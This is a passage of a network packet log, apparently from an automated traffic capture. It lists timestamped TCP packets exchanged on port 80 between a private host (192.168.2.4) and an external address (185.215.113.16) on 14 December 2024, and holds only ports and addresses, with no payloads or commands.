Dec 14, 2024 23:58:38.243237972 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.243290901 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.243360996 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.243364096 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.243403912 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.243547916 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.243613005 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.244302034 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.244349957 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.244559050 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.244607925 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.245301962 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.245359898 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.245464087 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.246392012 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.246443033 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.246526003 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.246572018 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.247354984 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.247405052 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.247488022 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.247536898 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.248347044 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.248398066 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.248531103 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.248581886 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.249373913 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.249423027 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.249501944 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.250466108 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.250514030 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.250634909 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.250682116 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.251395941 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.251444101 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.251533031 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.251583099 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.252408981 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.252461910 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.252543926 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.252590895 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.253495932 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.253582954 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.253632069 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.254429102 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.254477024 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.254597902 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.254647017 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.255466938 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.255517960 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.255603075 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.255650043 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.256474972 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.256522894 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.256609917 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.256653070 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.257471085 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.257647038 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.257694960 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.258522034 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.258572102 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.258688927 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.258739948 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.259542942 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.259591103 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.259691954 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.259741068 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.260543108 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.260591030 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.260713100 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.260759115 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.263699055 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.263950109 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.263983965 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.264004946 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.264048100 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.264439106 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.264472961 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.264492035 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.264514923 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.264527082 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.264564037 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.265225887 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.265278101 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.265501976 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.265827894 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.265861988 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.265888929 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.265904903 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.266622066 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.266788006 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.266836882 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.267627001 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.267673969 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.267801046 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.267848015 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.268663883 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.268717051 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.268817902 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.268867016 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.269665956 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.269860029 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.269910097 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.270744085 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.270792007 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.270886898 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.270932913 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.271698952 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.271749973 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.271862030 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.271915913 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.272747993 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.272795916 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.272878885 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.272936106 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.273775101 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.274034023 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.274084091 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.274749994 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.274797916 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.274892092 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.274951935 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.275774002 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.275823116 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.275963068 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.276010036 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.276773930 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.276820898 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.276921988 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.276968002 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.277810097 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.277971983 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.278019905 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.278894901 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.278943062 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.279007912 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.279057980 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.279860020 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.279906988 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.279989004 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.280035973 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.280846119 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.280893087 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.280975103 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.281021118 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.281877995 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.282059908 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.282107115 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.282876968 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.282923937 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.283020020 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.283066988 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.283935070 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.283982038 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.284043074 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.284099102 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.284893990 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.285072088 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.285123110 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.285916090 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.286140919 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.286192894 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.286942005 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.286988020 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.287091017 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.287136078 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.287965059 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.288012981 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.288095951 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.288142920 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.288992882 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.289042950 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.289159060 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.289206028 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.289973974 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.290142059 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.290190935 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.290994883 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.291044950 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.291162014 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.291209936 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.292015076 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.292062998 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.292145014 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.292191982 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.293029070 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.293076992 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.293199062 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.293243885 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.294111013 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.294239044 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.294297934 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.295074940 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.295121908 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.295200109 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.295248032 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.296024084 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.296072006 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.434962034 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.435000896 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.435055971 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.435404062 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.435465097 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.435534000 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.435693979 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.435729980 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.436039925 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.436534882 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.436575890 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.436655998 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.436769962 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.437609911 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.437660933 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.437727928 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.438172102 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.438591003 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.438633919 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.438812017 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.439620018 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.439670086 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.439708948 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.439757109 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.440634012 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.440682888 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.440798044 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.440845013 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.441634893 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.441693068 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.441749096 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.441795111 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.442667007 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.442749023 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.442780018 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.442823887 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.443646908 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.443733931 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.443802118 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.443888903 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.444883108 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.444936991 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.445018053 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.445080996 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.445707083 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.445763111 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.445919991 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.446002007 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.446708918 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.446758986 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.446821928 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.446877956 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.447715998 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.447767973 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.447846889 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.447885036 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.448786974 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.448837996 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.449018955 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.449073076 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.449770927 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.449815035 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.449881077 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.449927092 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.450757027 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.450808048 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.450875998 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.450920105 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.451773882 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.451827049 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.451900959 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.451939106 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.452805996 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.452857018 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.452929974 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.453032017 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.453834057 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.453881025 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.453919888 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.453960896 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.454799891 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.454840899 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.454953909 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.454998970 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.455835104 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.455876112 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.455956936 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.456007004 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.456844091 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.456890106 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.456965923 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.457051992 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.457870007 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.457921982 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.457998037 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.458255053 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.458888054 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.458936930 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.459021091 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.459065914 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.459882975 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.459928989 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.460017920 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.460059881 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.460896969 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.460953951 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.461116076 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.461168051 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.462049007 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.462101936 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.462148905 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.462927103 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.462977886 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.463092089 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.463145018 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.463982105 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.464124918 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.464174032 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.464960098 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.465066910 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.465158939 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.465209007 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.465981960 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.466027975 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.466109037 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.466187954 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.467001915 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.467052937 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.467133999 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.467171907 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.468017101 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.468060017 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.468147993 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.468252897 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.469048023 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.469093084 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.469166040 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.469443083 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.470053911 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.470114946 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:38.470170021 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:38.470216036 CET	49841	80	192.168.2.4	185.215.113.16
